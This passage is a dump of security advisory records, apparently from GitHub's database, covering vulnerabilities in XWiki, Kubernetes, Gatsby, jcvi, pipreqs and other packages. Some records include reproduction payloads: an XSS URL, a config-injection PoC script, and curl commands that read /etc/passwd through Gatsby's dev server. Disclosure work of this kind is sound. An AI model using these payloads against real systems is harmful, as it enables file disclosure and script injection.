14.4.8, 14.10.5 and 15.1RC1 by setting the content type of the response to plain text when the output syntax is not an HTML syntax. ### Workarounds The [patch](https://github.com/xwiki/xwiki-platform/commit/53e8292a31ec70fba5e1d705a4ac443658b9e6df#diff-e332fba67335bd2202bdac144be7cd244a16cef0ccee741f9c20025a981027d5) can be manually applied to the `rendercontent.vm` template in an existing installation to patch this vulnerability without upgrading. ### References * https://jira.xwiki.org/browse/XWIKI-20290 * https://github.com/xwiki/xwiki-platform/commit/53e8292a31ec70fba5e1d705a4ac443658b9e6df ","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.xwiki.platform:xwiki-platform-web'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.1'}, {'fixed': '14.4.8'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.xwiki.platform:xwiki-platform-web-templates'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '14.4.8'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.xwiki.platform:xwiki-platform-web-templates'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '14.5'}, {'fixed': '14.10.5'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.xwiki.platform:xwiki-platform-web-templates'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '15.0-rc-1'}, {'fixed': '15.1-rc-1'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-fp7h-f9f5-x4q7'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-34464'}, {'type': 'WEB', 'url': 'https://github.com/xwiki/xwiki-platform/commit/53e8292a31ec70fba5e1d705a4ac443658b9e6df'}, {'type': 'PACKAGE', 'url': 'https://github.com/xwiki/xwiki-platform'}, {'type': 'WEB', 'url': 'https://jira.xwiki.org/browse/XWIKI-20290'}]","{'cwe_ids': ['CWE-79'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-06-20T16:44:35Z', 'nvd_published_at': None}" 1.4.0,GHSA-xc8m-28vv-4pjc,2023-06-30T20:33:26Z,2023-06-16T09:30:24Z,,['CVE-2023-2431'],Kubelet vulnerable to bypass of seccomp profile enforcement,"A security issue was discovered in Kubelet that allows pods to bypass the seccomp profile enforcement. Pods that use localhost type for seccomp profile but specify an empty profile field, are affected by this issue. In this scenario, this vulnerability allows the pod to run in unconfined (seccomp disabled) mode. This bug affects Kubelet.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:N'}]","[{'package': {'ecosystem': 'Go', 'name': 'k8s.io/kubernetes'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.24.14'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'k8s.io/kubernetes'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.25.0'}, {'fixed': '1.25.10'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'k8s.io/kubernetes'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.26.0'}, {'fixed': '1.26.5'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'k8s.io/kubernetes'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.27.0'}, {'fixed': '1.27.2'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-2431'}, {'type': 'WEB', 'url': 'https://github.com/kubernetes/kubernetes/issues/118690'}, {'type': 'WEB', 'url': 'https://github.com/kubernetes/kubernetes/pull/117020'}, {'type': 'WEB', 'url': 'https://github.com/kubernetes/kubernetes/pull/117116'}, {'type': 'WEB', 'url': 'https://github.com/kubernetes/kubernetes/pull/117117'}, {'type': 'WEB', 'url': 'https://github.com/kubernetes/kubernetes/pull/117118'}, {'type': 'WEB', 'url': 'https://github.com/kubernetes/kubernetes/pull/117147'}, {'type': 'PACKAGE', 'url': 'https://github.com/kubernetes/kubernetes'}, {'type': 'WEB', 'url': 'https://groups.google.com/g/kubernetes-security-announce/c/QHmx0HOQa10'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/43HDSKBKPSW53OW647B5ETHRWFFNHSRQ/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/XBX4RL4UOC7JHWWYB2AJCKSUM7EG5Y5G/'}]","{'cwe_ids': ['CWE-1287'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-06-16T19:42:18Z', 'nvd_published_at': None}" 1.4.0,GHSA-pqwh-c2f3-vxmq,2023-06-09T19:31:54Z,2023-06-09T19:31:54Z,,['CVE-2021-32742'],Untrusted data fed into `Data.init(base32Encoded:)` can result in exposing server memory and/or crash,"### Impact A bug in the `Data.init(base32Encoded:)` function opens up the potential for exposing server memory and/or crashing the server (Denial of Service) for applications where untrusted data can end up in said function. Vapor does not currently use this function itself so this only impact applications that use the impacted function directly or through other dependencies. ### Patches This issue has been patched in 4.47.2. ### Workarounds Use an alternative to Vapor's built-in `Data.init(base32Encoded:)`. ### For more information If you have any questions or comments about this advisory: * Open an issue in [Vapor](https://github.com/vapor/vapor) * Ask in [Discord](http://vapor.team)",[],"[{'package': {'ecosystem': 'purl-type:swift', 'name': 'github.com/vapor/vapor'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.47.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/vapor/vapor/security/advisories/GHSA-pqwh-c2f3-vxmq'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-32742'}, {'type': 'PACKAGE', 'url': 'https://github.com/vapor/vapor'}, {'type': 'WEB', 'url': 'https://github.com/vapor/vapor/releases/tag/4.47.2'}]","{'cwe_ids': ['CWE-502'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-06-09T19:31:54Z', 'nvd_published_at': '2021-07-09T14:15:00Z'}" 1.4.0,GHSA-gc34-5v43-h7v8,2023-06-22T20:04:01Z,2023-06-13T18:30:40Z,,['CVE-2023-3224'],nuxt Code Injection vulnerability,he Nuxt dev server between versions 3.4.0 and 3.4.3 is vulnerable to code injection when it is exposed publicly.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'nuxt'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.4.0'}, {'fixed': '3.4.3'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-3224'}, {'type': 'WEB', 'url': 'https://github.com/nuxt/nuxt/issues/21694'}, {'type': 'WEB', 'url': 'https://github.com/nuxt/nuxt/commit/65a8f4eb3ef1b249a95fd59e323835a96428baff'}, {'type': 'WEB', 'url': 'https://github.com/nuxt/nuxt/commit/72ba53efbc2384f802d654fffd92eaf36a81b507'}, {'type': 'PACKAGE', 'url': 'https://github.com/nuxt/nuxt'}, {'type': 'WEB', 'url': 'https://github.com/nuxt/nuxt/commits/v3.4.3'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/1eb74fd8-0258-4c1f-a904-83b52e373a87'}]","{'cwe_ids': ['CWE-94'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-06-21T22:09:01Z', 'nvd_published_at': None}" 1.4.0,GHSA-f4m6-x2xj-jc7w,2023-06-16T19:50:28Z,2023-06-16T15:30:19Z,,['CVE-2023-35783'],ke_search (aka Faceted Search) vulnerable to Cross-Site Scripting,"The ke_search (aka Faceted Search) extension before 4.0.3, 4.1.x through 4.6.x before 4.6.6, and 5.x before 5.0.2 for TYPO3 allows XSS via indexed data.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'tpwd/ke_search'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '5.0.0'}, {'fixed': '5.0.2'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'tpwd/ke_search'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.1.0'}, {'fixed': '4.6.6'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'tpwd/ke_search'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.0.3'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-35783'}, {'type': 'WEB', 'url': 'https://github.com/tpwd/ke_search/commit/14fa0703c2469e04eb398be4ae6268ec6ad6e720'}, {'type': 'WEB', 'url': 'https://github.com/tpwd/ke_search/commit/b0f05d7e7e207bc0d5051bd96f3ff43c5c3658c6'}, {'type': 'WEB', 'url': 'https://github.com/tpwd/ke_search/commit/d81a1f2f3dcb612220d505b495bc2851b87f6f74'}, {'type': 'WEB', 'url': 'https://github.com/FriendsOfPHP/security-advisories/blob/master/tpwd/ke_search/CVE-2023-35783.yaml'}, {'type': 'PACKAGE', 'url': 'https://github.com/tpwd/ke_search'}, {'type': 'WEB', 'url': 'https://typo3.org/security/advisory/typo3-ext-sa-2023-004'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-06-16T19:50:28Z', 'nvd_published_at': None}" 1.4.0,GHSA-chw4-88xc-79w6,2023-06-16T17:47:20Z,2023-06-09T03:30:24Z,,['CVE-2023-3173'],Froxlor vulnerable to Improper Restriction of Excessive Authentication Attempts,Improper Restriction of Excessive Authentication Attempts in GitHub repository froxlor/froxlor prior to 2.0.20.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'froxlor/froxlor'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.0.20'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-3173'}, {'type': 'WEB', 'url': 'https://github.com/froxlor/froxlor/commit/464216072456efb35b4541c58e7016463dfbd9a6'}, {'type': 'PACKAGE', 'url': 'https://github.com/froxlor/froxlor'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/4d715f76-950d-4251-8139-3dffea798f14'}]","{'cwe_ids': ['CWE-307'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-06-09T22:41:26Z', 'nvd_published_at': None}" 1.4.0,GHSA-qmw8-x364-xxxm,2023-06-16T17:46:37Z,2023-06-10T09:30:16Z,,['CVE-2023-3191'],Teampass Cross-site Scripting vulnerability,In versions of nilsteampassnet/teampass prior to 3.0.9 some user input was not properly sanitized which may have lead to stored cross-site scripting (XSS) vectors in the application.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'nilsteampassnet/teampass'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.0.9'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-3191'}, {'type': 'WEB', 'url': 'https://github.com/nilsteampassnet/teampass/commit/241dbd4159a5d63b55af426464d30dbb53925705'}, {'type': 'PACKAGE', 'url': 'https://github.com/nilsteampassnet/teampass'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/19fed157-128d-4bfb-a30e-eadf748cbd1a'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-06-12T18:00:47Z', 'nvd_published_at': None}" 1.4.0,GHSA-mwxj-g7fw-7hc8,2023-06-26T16:33:58Z,2023-06-22T19:59:33Z,,['CVE-2023-35158'],XWiki Platform vulnerable to reflected cross-site scripting via xredirect parameter in restore template,"### Impact Users are able to forge an URL with a payload allowing to inject Javascript in the page (XSS). It's possible to exploit the restore template to perform a XSS, e.g. by using URL such as: > /xwiki/bin/view/XWiki/Main?xpage=restore&showBatch=true&xredirect=javascript:alert(document.domain) This vulnerability exists since XWiki 9.4-rc-1. ### Patches The vulnerability has been patched in XWiki 14.10.5 and 15.1-rc-1. ### Workarounds It's possible to workaround the vulnerability by editing the template restore.vm to perform checks on it, but note that the appropriate fix involves new APIs that have been recently introduced in XWiki. See the referenced jira tickets. ### References * Vulnerability in restore template: https://jira.xwiki.org/browse/XWIKI-20352 * Introduction of the macro used for fixing this vulnerability: https://jira.xwiki.org/browse/XWIKI-20583 * Commit containing the actual fix in the template: https://github.com/xwiki/xwiki-platform/commit/d5472100606c8355ed44ada273e91df91f682738 ### For more information If you have any questions or comments about this advisory: * Open an issue in [Jira XWiki.org](https://jira.xwiki.org/) * Email us at [Security Mailing List](mailto:security@xwiki.org) ### Attribution Both vulnerabilities about the delete and restore templates have been reported by René de Sain @renniepak.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.xwiki.platform:xwiki-platform-flamingo-skin-resources'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '9.4-rc-1'}, {'fixed': '14.10.5'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.xwiki.platform:xwiki-platform-flamingo-skin-resources'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '15.0-rc-1'}, {'fixed': '15.1-rc-1'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-mwxj-g7fw-7hc8'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-35158'}, {'type': 'WEB', 'url': 'https://github.com/xwiki/xwiki-platform/commit/d5472100606c8355ed44ada273e91df91f682738'}, {'type': 'PACKAGE', 'url': 'https://github.com/xwiki/xwiki-platform'}, {'type': 'WEB', 'url': 'https://jira.xwiki.org/browse/XWIKI-20352'}, {'type': 'WEB', 'url': 'https://jira.xwiki.org/browse/XWIKI-20583'}]","{'cwe_ids': ['CWE-87'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-06-22T19:59:33Z', 'nvd_published_at': None}" 1.4.0,GHSA-x49m-3cw7-gq5q,2023-06-26T16:31:23Z,2023-06-23T21:44:35Z,,['CVE-2023-35932'],jcvi vulnerable to Configuration Injection due to unsanitized user input ,"### Summary A configuration injection happens when user input is considered by the application in an unsanitized format and can reach the configuration file. A malicious user may craft a special payload that may lead to a command injection. ### PoC The vulnerable code snippet is [/jcvi/apps/base.py#LL2227C1-L2228C41](https://github.com/tanghaibao/jcvi/blob/cede6c65c8e7603cb266bc3395ac8f915ea9eac7/jcvi/apps/base.py#LL2227C1-L2228C41). Under some circumstances a user input is retrieved and stored within the `fullpath` variable which reaches the configuration file `~/.jcvirc`. ```python fullpath = input(msg).strip() config.set(PATH, name, fullpath) ``` I ripped a part of the codebase into a runnable PoC as follows. All the PoC does is call the `getpath()` function under some circumstances. ```python from configparser import ( ConfigParser, RawConfigParser, NoOptionError, NoSectionError, ParsingError, ) import errno import os import sys import os.path as op import shutil import signal import sys import logging def is_exe(fpath): return op.isfile(fpath) and os.access(fpath, os.X_OK) def which(program): """""" Emulates the unix which command. >>> which(""cat"") ""/bin/cat"" >>> which(""nosuchprogram"") """""" fpath, fname = op.split(program) if fpath: if is_exe(program): return program else: for path in os.environ[""PATH""].split(os.pathsep): exe_file = op.join(path, program) if is_exe(exe_file): return exe_file return None def getpath(cmd, name=None, url=None, cfg=""~/.jcvirc"", warn=""exit""): """""" Get install locations of common binaries First, check ~/.jcvirc file to get the full path If not present, ask on the console and store """""" p = which(cmd) # if in PATH, just returns it if p: return p PATH = ""Path"" config = RawConfigParser() cfg = op.expanduser(cfg) changed = False if op.exists(cfg): config.read(cfg) assert name is not None, ""Need a program name"" try: fullpath = config.get(PATH, name) except NoSectionError: config.add_section(PATH) changed = True try: fullpath = config.get(PATH, name) except NoOptionError: msg = ""=== Configure path for {0} ===\n"".format(name, cfg) if url: msg += ""URL: {0}\n"".format(url) msg += ""[Directory that contains `{0}`]: "".format(cmd) fullpath = input(msg).strip() config.set(PATH, name, fullpath) changed = True path = op.join(op.expanduser(fullpath), cmd) if warn == ""exit"": try: assert is_exe(path), ""***ERROR: Cannot execute binary `{0}`. "".format(path) except AssertionError as e: sys.exit(""{0!s}Please verify and rerun."".format(e)) if changed: configfile = open(cfg, ""w"") config.write(configfile) logging.debug(""Configuration written to `{0}`."".format(cfg)) return path # Call to getpath path = getpath(""not-part-of-path"", name=""CLUSTALW2"", warn=""warn"") print(path) ``` To run the PoC, you need to remove the config file `~/.jcvirc` to emulate the first run, ```bash # Run the PoC with the payload echo -e ""e\rvvvvvvvv = zzzzzzzz\n"" | python3 poc.py ``` ![image](https://user-images.githubusercontent.com/13036531/247852364-f8a384a3-fc62-41ca-b467-877d197ac6ff.png) You can notice the random key/value characters `vvvvvvvv = zzzzzzzz` were successfully injected. ### Impact The impact of a configuration injection may vary. Under some conditions, it may lead to command injection if there is for instance shell code execution from the configuration file values. ","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:L'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'jcvi'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '1.3.5'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/tanghaibao/jcvi/security/advisories/GHSA-x49m-3cw7-gq5q'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-35932'}, {'type': 'PACKAGE', 'url': 'https://github.com/tanghaibao/jcvi'}, {'type': 'WEB', 'url': 'https://github.com/tanghaibao/jcvi/blob/cede6c65c8e7603cb266bc3395ac8f915ea9eac7/jcvi/apps/base.py#LL2227C1-L2228C41'}]","{'cwe_ids': ['CWE-1284', 'CWE-77'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-06-23T21:44:35Z', 'nvd_published_at': None}" 1.4.0,GHSA-v4f4-23wc-99mh,2023-07-10T19:06:13Z,2023-06-30T21:30:26Z,,['CVE-2023-31543'],pipreqs vulnerable to Dependency Confusion,A dependency confusion in pipreqs v0.3.0 to v0.4.11 allows attackers to execute arbitrary code via uploading a crafted PyPI package to the chosen repository server.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'pipreqs'}, 'ecosystem_specific': {'affected_functions': ['pipreqs.pipreqs.get_import_local', 'pipreqs.pipreqs.init']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.3.0'}, {'fixed': '0.4.12'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-31543'}, {'type': 'WEB', 'url': 'https://github.com/bndr/pipreqs/pull/364'}, {'type': 'WEB', 'url': 'https://github.com/bndr/pipreqs/commit/3f5964fcb90ec6eb6df46d78e651a1b73538d0ba'}, {'type': 'WEB', 'url': 'https://gist.github.com/adeadfed/ccc834440af354a5638f889bee34bafe'}, {'type': 'PACKAGE', 'url': 'https://github.com/bndr/pipreqs'}, {'type': 'WEB', 'url': 'https://github.com/bndr/pipreqs/blob/master/pipreqs/pipreqs.py#L447-L449'}, {'type': 'WEB', 'url': 'https://github.com/pypa/advisory-database/tree/main/vulns/pipreqs/PYSEC-2023-99.yaml'}]","{'cwe_ids': ['CWE-427'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-06-30T22:12:37Z', 'nvd_published_at': None}" 1.4.0,GHSA-r6ww-5963-7r95,2023-06-09T19:33:16Z,2023-06-09T19:33:16Z,,['CVE-2022-24777'],Denial of Service via reachable assertion,"A grpc-swift server is vulnerable to a denial of service attack via a reachable assertion. This was due to incorrect logic when handling `GOAWAY` frames. The attack is low-effort: it takes very little resources to construct and send the required sequence of frames. The impact on availability is high as the server will crash, dropping all in flight connections and requests. The issue was discovered by automated fuzz testing and is resolved by fixing the relevant state handling code.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'purl-type:swift', 'name': 'https://github.com/grpc/grpc-swift.git'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.7.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/grpc/grpc-swift/security/advisories/GHSA-r6ww-5963-7r95'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2022-24777'}, {'type': 'WEB', 'url': 'https://github.com/grpc/grpc-swift/commit/858f977f2a51fca2292f384cf7a108dc2e73a3bd'}, {'type': 'PACKAGE', 'url': 'https://github.com/grpc/grpc-swift'}]","{'cwe_ids': ['CWE-617'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-06-09T19:33:16Z', 'nvd_published_at': '2022-03-25T17:15:00Z'}" 1.4.0,GHSA-42qm-8v8m-m78c,2023-06-01T19:10:40Z,2023-06-01T19:10:40Z,,[],PocketMine MP vulnerable to uncontrolled resource consumption via mismatched type of 'InventoryTransactionPacket',"### Impact A ""mismatch"" type `InventoryTransactionPacket` is sent by the client to request a resync of all currently open inventories. Since PocketMine-MP does not rate-limit these ""mismatch"" transactions, and the syncing of inventories is not deferred until, e.g. the end of the current tick, they can be used as a very cheap bandwidth multiplier by making the server send out many MB of data (network serialized inventory items can be very large, especially when dealing with large amounts of NBT). This is not currently known to have been exploited in the wild. ### Patches This problem was fixed in 4.18.0-ALPHA2 by ca6d51498f12427a947467da8fcad7811418e6cc alongside the introduction of the `ItemStackRequest` system implementation. ### Workarounds Plugins can handle `DataPacketReceiveEvent` for `InventoryTransactionPacket` and check if the type is `MismatchTransactionData`. If it is, apply some kind of rate limit (e.g. max 1 per tick).","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'pocketmine/pocketmine-mp'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.18.0-ALPHA2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/pmmp/PocketMine-MP/security/advisories/GHSA-42qm-8v8m-m78c'}, {'type': 'PACKAGE', 'url': 'https://github.com/pmmp/PocketMine-MP'}, {'type': 'WEB', 'url': 'https://github.com/pmmp/PocketMine-MP/blob/4.18.0-ALPHA2/changelogs/4.18-alpha.md#4180-ALPHA2'}]","{'cwe_ids': ['CWE-400'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-06-01T19:10:40Z', 'nvd_published_at': None}" 1.4.0,GHSA-c6f8-8r25-c4gc,2023-06-09T22:52:01Z,2023-06-09T22:52:01Z,,['CVE-2023-34238'],Gatsby develop server has Local File Inclusion vulnerability,"### Impact The Gatsby framework prior to versions 4.25.7 and 5.9.1 contain a Local File Inclusion vulnerability in the `__file-code-frame` and `__original-stack-frame` paths, exposed when running the Gatsby develop server (`gatsby develop`). The following steps can be used to reproduce the vulnerability: ``` # Create a new Gatsby project $ npm init gatsby $ cd my-gatsby-site # Start the Gatsby develop server $ gatsby develop # Execute the Local File Inclusion vulnerability in __file-code-frame $ curl ""http://127.0.0.1:8000/__file-code-frame?filePath=/etc/passwd&lineNumber=1"" # Execute the Local File Inclusion vulnerability in __original-stack-frame $ curl ""http://127.0.0.1:8000/__original-stack-frame?moduleId=/etc/hosts&lineNumber=1&skipSourceMap=1"" ``` It should be noted that by default `gatsby develop` is only accessible via the localhost `127.0.0.1`, and one would need to intentionally expose the server to other interfaces to exploit this vulnerability by using server options such as `--host 0.0.0.0`, `-H 0.0.0.0`, or the `GATSBY_HOST=0.0.0.0` environment variable. ### Patches A patch has been introduced in `gatsby@5.9.1` and `gatsby@4.25.7` which mitigates the issue. ### Workarounds As stated above, by default `gatsby develop` is only exposed to the localhost `127.0.0.1`. For those using the develop server in the default configuration no risk is posed. If other ranges are required, preventing the develop server from being exposed to untrusted interfaces or IP address ranges would mitigate the risk from this vulnerability. We encourage projects to upgrade to the latest major release branch for all Gatsby plugins to ensure the latest security updates and bug fixes are received in a timely manner. ### Credits We would like to thank Maxwell Garrett of Assetnote for bringing the `__file-code-frame` issue to our attention. ### For more information Email us at [security@gatsbyjs.com](mailto:security@gatsbyjs.com).","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'gatsby'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.25.7'}]}], 'database_specific': {'last_known_affected_version_range': '<= 4.25.6'}}, {'package': {'ecosystem': 'npm', 'name': 'gatsby'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '5.0.0'}, {'fixed': '5.9.1'}]}], 'database_specific': {'last_known_affected_version_range': '<= 5.9.0'}}]","[{'type': 'WEB', 'url': 'https://github.com/gatsbyjs/gatsby/security/advisories/GHSA-c6f8-8r25-c4gc'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-34238'}, {'type': 'WEB', 'url': 'https://github.com/gatsbyjs/gatsby/commit/ae5a654eb346b2e7a9d341b809b2f82d34c0f17c'}, {'type': 'WEB', 'url': 'https://github.com/gatsbyjs/gatsby/commit/fc22f4ba3ad7ca5fb3592f38f4f0ca8ae60b4bf7'}, {'type': 'PACKAGE', 'url': 'https://github.com/gatsbyjs/gatsby'}]","{'cwe_ids': ['CWE-22'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-06-09T22:52:01Z', 'nvd_published_at': None}" 1.4.0,GHSA-5cpq-8wj7-hf2v,2023-06-02T17:13:10Z,2023-06-02T17:13:10Z,,[],Vulnerable OpenSSL included in cryptography wheels,"pyca/cryptography's wheels include a statically linked copy of OpenSSL. The versions of OpenSSL included in cryptography 0.5-40.0.2 are vulnerable to a security issue. More details about the vulnerability itself can be found in https://www.openssl.org/news/secadv/20230530.txt. If you are building cryptography source (""sdist"") then you are responsible for upgrading your copy of OpenSSL. Only users installing from wheels built by the cryptography project (i.e., those distributed on PyPI) need to update their cryptography versions.",[],"[{'package': {'ecosystem': 'PyPI', 'name': 'cryptography'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.5'}, {'fixed': '41.0.0'}]}], 'database_specific': {'last_known_affected_version_range': '<= 40.0.2'}}]","[{'type': 'WEB', 'url': 'https://github.com/pyca/cryptography/security/advisories/GHSA-5cpq-8wj7-hf2v'}, {'type': 'WEB', 'url': 'https://github.com/pyca/cryptography/commit/8708245ccdeaff21d65eea68a4f8d2a7c5949a22'}, {'type': 'WEB', 'url': 'https://cryptography.io/en/latest/changelog/#v41-0-0'}, {'type': 'PACKAGE', 'url': 'https://github.com/pyca/cryptography'}]","{'cwe_ids': [], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2023-06-02T17:13:10Z', 'nvd_published_at': None}" 1.4.0,GHSA-88q2-h5g3-p4pg,2023-06-14T17:01:16Z,2023-06-14T17:01:16Z,,['CVE-2023-24897'],.NET Remote Code Execution Vulnerability,"# Microsoft Security Advisory CVE-2023-24897: .NET Remote Code Execution Vulnerability ## Executive summary Microsoft is releasing this security advisory to provide information about a vulnerability in .NET 7.0 and .NET 6.0. This advisory also provides guidance on what developers can do to update their applications to remove this vulnerability. This security update addresses a vulnerability in the MSDIA SDK where corrupted PDBs can cause heap overflow, leading to a crash or remove code execution ## Announcement Announcement for this issue can be found at https://github.com/dotnet/announcements/issues/260 ### Mitigation factors Microsoft has not identified any mitigating factors for this vulnerability. ## Affected software * Any .NET 7.0 application running on .NET 7.0.5 or earlier. * Any .NET 6.0 application running on .NET 6.0.16 or earlier. If your application uses the following package versions, ensure you update to the latest version of .NET. ### .NET 7 Package name | Affected version | Patched version ------------ | ---------------- | ------------------------- [Microsoft.NetCore.App.Runtime.win-arm](https://www.nuget.org/packages/Microsoft.NetCore.App.Runtime.win-arm) | >= 7.0.0, <= 7.0.5 | 7.0.7 [Microsoft.NetCore.App.Runtime.win-arm64](https://www.nuget.org/packages/Microsoft.NetCore.App.Runtime.win-arm64) | >= 7.0.0, <= 7.0.5 | 7.0.7 [Microsoft.NetCore.App.Runtime.win-x64](https://www.nuget.org/packages/Microsoft.NetCore.App.Runtime.win-x64) | >= 7.0.0, <= 7.0.5 | 7.0.7 [Microsoft.NetCore.App.Runtime.win-x86](https://www.nuget.org/packages/Microsoft.NetCore.App.Runtime.win-x86) | >= 7.0.0, <= 7.0.5 | 7.0.7 ### .NET 6 Package name | Affected version | Patched version ------------ | ---------------- 